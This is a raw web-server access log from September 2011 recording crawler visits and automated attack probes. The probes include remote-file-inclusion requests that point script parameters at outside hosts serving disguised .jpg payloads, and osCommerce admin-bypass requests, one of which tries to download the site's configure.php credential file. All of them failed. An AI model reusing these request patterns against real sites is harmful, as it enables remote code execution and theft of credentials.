70.38.92.90 - - [09/Sep/2011:15:05:57 +0000] "GET /Account//spaw_control.class.php?spaw_root=http://203.124.43.69:2121/modules/osc/byroe.jpg?? HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
70.38.92.90 - - [09/Sep/2011:15:05:58 +0000] "GET /Account//spaw_control.class.php?spaw_root=http://203.124.43.69:2121/modules/osc/allnet.jpg?? HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
67.195.115.166 - - [09/Sep/2011:15:18:51 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [09/Sep/2011:15:18:51 +0000] "GET /?C=D;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.36.89.254 - - [09/Sep/2011:16:35:20 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:35:20 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:35:21 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:36:07 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:36:07 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:36:07 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:38:58 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:38:58 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
69.36.89.254 - - [09/Sep/2011:16:38:58 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML, like Gecko)Safari/413"
123.125.71.47 - - [09/Sep/2011:16:57:58 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
89.42.200.23 - - [09/Sep/2011:17:40:12 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.834"
89.42.200.23 - - [09/Sep/2011:17:40:12 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.834"
81.52.143.32 - - [09/Sep/2011:22:23:19 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.32 - - [09/Sep/2011:22:23:21 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
95.108.158.245 - - [10/Sep/2011:00:59:01 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
95.108.240.251 - - [10/Sep/2011:01:08:41 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [10/Sep/2011:02:11:39 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [10/Sep/2011:02:11:39 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.82 - - [10/Sep/2011:02:55:39 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.52.104.89 - - [10/Sep/2011:03:40:52 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [10/Sep/2011:03:41:35 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 354099 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
208.80.194.30 - - [10/Sep/2011:05:39:22 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); HbTools 4.7.1)"
66.249.72.210 - - [10/Sep/2011:05:39:51 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [10/Sep/2011:05:39:52 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.240.251 - - [10/Sep/2011:09:06:07 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
180.76.5.87 - - [10/Sep/2011:09:15:17 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.115.166 - - [10/Sep/2011:11:53:04 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [10/Sep/2011:11:53:04 +0000] "GET /Account/?C=D;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [10/Sep/2011:11:57:08 +0000] "GET /Account/?C=D;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.52.104.89 - - [10/Sep/2011:12:49:53 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [10/Sep/2011:12:50:35 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.71.158.174 - - [10/Sep/2011:14:51:18 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:51:18 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:53:31 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:53:31 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:54:06 +0000] "GET /Account/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 404 355 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:54:06 +0000] "GET /admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 404 347 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:55:31 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
64.71.158.174 - - [10/Sep/2011:14:55:31 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "ConveraMultiMediaCrawler/0.1 (+http://www.authoritativeweb.com/crawl)"
202.134.0.113 - - [10/Sep/2011:15:20:00 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:01 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:03 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:05 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:06 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:20 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:21 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:23 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:51 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.134.0.113 - - [10/Sep/2011:15:20:52 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.195.115.166 - - [10/Sep/2011:18:01:52 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.240.251 - - [10/Sep/2011:18:26:39 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [10/Sep/2011:21:51:32 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [10/Sep/2011:22:27:37 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
217.27.212.44 - - [10/Sep/2011:22:32:31 +0000] "GET /Account//include/lib.inc.php?site_path=test?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [10/Sep/2011:22:32:32 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [10/Sep/2011:22:32:33 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [10/Sep/2011:22:32:35 +0000] "GET //include/lib.inc.php?site_path=test?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [10/Sep/2011:22:32:36 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [10/Sep/2011:22:32:37 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
88.131.106.8 - - [11/Sep/2011:00:55:47 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.3 - - [11/Sep/2011:00:55:50 +0000] "GET /Account/?C=S;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
95.108.240.251 - - [11/Sep/2011:01:05:09 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.219.58.38 - - [11/Sep/2011:01:26:10 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.38 - - [11/Sep/2011:01:26:10 +0000] "GET / HTTP/1.1" 200 749 "-" "MLBot (www.metadatalabs.com/mlbot)"
95.108.240.251 - - [11/Sep/2011:02:48:30 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.112 - - [11/Sep/2011:03:30:44 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.152 - - [11/Sep/2011:04:51:29 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.52.104.89 - - [11/Sep/2011:08:01:19 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [11/Sep/2011:08:02:02 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 363054 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
193.47.80.51 - - [11/Sep/2011:09:17:05 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [11/Sep/2011:09:17:05 +0000] "GET /Account/?C=N;O=D HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [11/Sep/2011:09:17:08 +0000] "GET /Account/?C=S;O=A HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [11/Sep/2011:09:17:10 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 363711 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
208.80.194.28 - - [11/Sep/2011:09:49:55 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:01 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:04 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:04 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.33.55.11 - - [11/Sep/2011:11:53:04 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
119.63.196.60 - - [11/Sep/2011:14:02:10 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.46 - - [11/Sep/2011:14:53:09 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:03:35 +0000] "GET /Account//include/lib.inc.php?site_path=test?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:03:37 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:03:38 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 343 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:03:39 +0000] "GET //include/lib.inc.php?site_path=test?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:03:40 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:03:42 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
217.27.212.44 - - [11/Sep/2011:19:04:01 +0000] "GET /Account//include/lib.inc.php?site_path=test?? HTTP/1.1" 404 343 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:04:02 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 343 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:04:03 +0000] "GET /Account//include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 343 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:04:04 +0000] "GET //include/lib.inc.php?site_path=test?? HTTP/1.1" 404 334 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:04:06 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/multi.jpg?? HTTP/1.1" 404 334 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.27.212.44 - - [11/Sep/2011:19:04:07 +0000] "GET //include/lib.inc.php?site_path=http://mogyorok.hu//e107_images/custom/user.jpg?? HTTP/1.1" 404 334 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
119.63.196.59 - - [11/Sep/2011:19:48:14 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.108.67.13 - - [11/Sep/2011:19:56:28 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.108.67.13 - - [11/Sep/2011:19:56:28 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.0" 404 339 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
64.71.158.174 - - [11/Sep/2011:20:54:53 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:54:53 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:54:53 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:27 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:27 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:28 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:28 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:29 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
64.71.158.174 - - [11/Sep/2011:20:55:30 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i"
95.108.158.245 - - [11/Sep/2011:21:32:12 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [11/Sep/2011:21:40:10 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [11/Sep/2011:21:40:11 +0000] "GET /Account/access_log.txt HTTP/1.0" 200 371435 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.120.174 - - [11/Sep/2011:23:00:50 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.108.120.174 - - [11/Sep/2011:23:00:50 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.108.120.174 - - [11/Sep/2011:23:00:51 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.108.120.174 - - [11/Sep/2011:23:00:51 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.108.120.174 - - [11/Sep/2011:23:00:52 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.108.120.174 - - [11/Sep/2011:23:00:53 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
205.251.131.94 - - [12/Sep/2011:01:16:53 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
205.251.131.94 - - [12/Sep/2011:01:16:56 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
205.251.131.94 - - [12/Sep/2011:01:17:02 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
123.125.71.35 - - [12/Sep/2011:03:20:07 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
